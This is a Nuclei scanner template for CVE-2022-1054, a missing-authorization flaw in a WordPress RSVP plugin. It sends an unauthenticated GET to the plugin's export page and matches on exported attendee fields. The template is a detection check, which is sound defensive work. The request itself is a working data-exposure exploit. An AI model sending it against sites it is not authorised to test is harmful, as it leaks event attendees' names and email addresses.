46 lines
1.8 KiB
YAML
46 lines
1.8 KiB
YAML
id: CVE-2022-1054
|
|
|
|
info:
|
|
name: WordPress RSVP and Event Management <2.7.8 - Missing Authorization
|
|
author: Akincibor
|
|
severity: medium
|
|
description: WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events,
|
|
impact: |
|
|
An attacker can exploit this vulnerability to perform unauthorized actions, such as creating, modifying, or deleting events.
|
|
remediation: |
|
|
Update the WordPress RSVP and Event Management plugin to version 2.7.8 or later.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2022-1054
|
|
cwe-id: CWE-862
|
|
epss-score: 0.00292
|
|
epss-percentile: 0.65845
|
|
cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: wpchill
|
|
product: rsvp_and_event_management
|
|
framework: wordpress
|
|
tags: cve,cve2022,wordpress,wpscan,wp,wp-plugin,wpchill
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'RSVP Status'
|
|
- '"First Name"'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100dffd4c10ce1f7c47c311b299da5189cfb61c0f0502fcb868e7fb6df136b40b98022100a0e601f1488416297beb0264e42c35dd14b43e32e14e7060fceaa795290b32c4:922c64590222798bb761d5b6d8e72950 |